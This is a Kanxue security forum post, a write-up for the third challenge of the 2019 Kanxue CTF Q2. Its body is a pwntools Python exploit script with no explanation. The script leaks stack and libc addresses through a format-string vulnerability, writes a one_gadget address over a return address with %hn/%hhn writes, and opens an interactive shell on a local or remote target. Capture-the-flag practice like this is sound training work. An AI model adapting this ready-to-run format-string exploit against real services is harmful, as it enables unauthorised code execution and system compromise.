[原创] 2019看雪CTFQ2第三题WP-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创] 2019看雪CTFQ2第三题WP

2019-6-11 16:19 2067

[原创] 2019看雪CTFQ2第三题WP

pinohans

2019-6-11 16:19

2067

import sys
from pwn import *

###########
# args
###########
context.os          = 'linux'
context.arch        = 'i386'
context.log_level   = 'debug'
context.terminal    = ['tmux', 'splitw', '-h']

elf_file  = './format'
libc_file = './libc-2.23.so'
###########

elf     = ELF(elf_file)
libc    = ELF(libc_file)
rop     = ELF(libc_file)


def form(s):
    p.sendlineafter('Choice:', '1')
    p.sendlineafter('What do tou want to say:', s)
    return p.recvline()[:-1]

def run():
    esp = int(form(r'%5$x'), 16) + 0xffffd6e0 - 0xffffd7b4
    log.success('%s ===> %x' % ('esp', esp))
    log.success('%s ===> %x' % ('off', ((esp + 15 * 4) & 0xffff)))
    libc.address = int(form(r'%12$x'), 16) + 0xf75cd000 - 0xf777d000
    log.success('%s ===> %x' % ('libc.address', libc.address))
    one_gadget = libc.address + one
    log.success('%s ===> %x' % ('one_gadget', one_gadget))
    one_gadget = p32(one_gadget)
    for index, c in enumerate(one_gadget):
        form('%%%dc%%5$hn' % ((esp + 15 * 4 + index) & 0xffff))
        form('%%%dc%%53$hhn' % (ord(c)))
    p.interactive()

if __name__ == '__main__':
    if len(sys.argv) > 1:
        p = remote(sys.argv[1], int(sys.argv[2]))
        one = 0x5f065
    else:
        p = process(elf_file, env={'LD_PRELOAD': libc_file})
        gdb.attach(p)
        one = 0x5f065

    run()

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・0

点赞・1

打赏